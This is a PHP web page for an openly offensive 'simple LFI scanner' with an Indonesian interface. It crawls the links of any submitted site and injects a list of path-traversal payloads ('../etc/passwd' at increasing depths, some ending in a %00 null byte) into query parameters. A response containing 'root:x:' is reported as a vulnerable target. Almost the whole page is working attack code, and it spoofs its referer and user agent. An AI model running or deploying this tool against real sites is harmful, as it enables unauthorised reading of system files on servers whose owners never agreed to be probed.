Untitled

<html>
<head> <title>+- simple LFI scanner -+</title>
<body>
<center><h1>simple LFI scanner</h1>
<form method='post'>
source : http://github.com/fakhrizulkifli/Website-Vulnerability-Scanner-v1.0/ <br>
masukan alamat website : </br></br>
<input type='text' size='23' name='site' value='' placeholder='contoh http://google.com/'><br>
<input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
</form>


<?php
function Get_Info($site) {
    if($info = con_host($site)) {
        preg_match("/Content-Type:(.+)/", $info, $type);
        preg_match("/Server:(.+)/", $info, $server);
        print "[-] $type[0]<br>";
        print "[-] $server[0]<br>";
        $ip = parse_url($site);
        print "[-] IP: ".gethostbyname($ip['host'])."<br>";
    }
}

function con_host($host) {
    $ch = curl_init($host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
    $pg = curl_exec($ch);
    if($pg){
        return $pg;
    } else {
        return false;
    }
}

function find_link($site) {
    if($text = con_host($site)) {
    $find = "/href=[\"']?([^\"']+)?[\"']?/i";
    preg_match_all($find, $text, $links);

    foreach($links[1] as $link) {
        $a[] = $link;
    }
    return $a;
 }
}


function lfi($site) {
    $list_lfi = array(
        '../etc/passwd',
        '../../etc/passwd',
        '../../../etc/passwd',
        '../../../../etc/passwd',
        '../../../../../etc/passwd',
        '../../../../../../etc/passwd',
        '../../../../../../../etc/passwd',
        '../../../../../../../../etc/passwd',
        '../../../../../../../../../etc/passwd',
        '../etc/passwd%00',
        '../../etc/passwd%00',
        '../../../etc/passwd%00',
        '../../../../etc/passwd%00',
        '../../../../../etc/passwd%00',
        '../../../../../../etc/passwd%00',
        '../../../../../../../etc/passwd%00',
        '../../../../../../../../etc/passwd%00',
        '../../../../../../../../../etc/passwd%00',
    );

        $request = parse_url($site);
        print "[-] URL : $request[host]<br>";
        print "[-] Path: $request[path]<br>";
        print "[-] Try connect to host<br>";
        $url = "".$request['scheme']."://".$request['host'].$request['path']."";
        if(con_host($url))
        {
            print "[+] Connect to host successful<br>";
            print Get_Info($url);
            print "[-] Finding link on the website<br>";
            print "[+] Found link : ".count(find_link($url))."<br>";
            print "[-] Finding vulnerable...<br>";
            if(is_array(find_link($url)))
            foreach(find_link($url) as $link) {
                $file = explode("/", $request['path']);
                $request['path'] = preg_replace("/".$file[count($file)-1]."/", "", $request['path']);
                if(!preg_match("/$request[host]/", $link)) { $link = "http://$request[host]/$request[path]$link"; }
                foreach($list_lfi as $error) {
                    $link = preg_replace("/=(.+)/", "=$error", $link);
                    if(preg_match("/root:x:/", con_host($link))) {
                        print "[-]LFI vulnerable : $link<br>";
                        $save[] = $link;
                    }
                }
            }
            print "[-] Done<br>";
    }
  }
$site=$_POST['site'];
lfi($site);
?>
</center>
</body>
</html>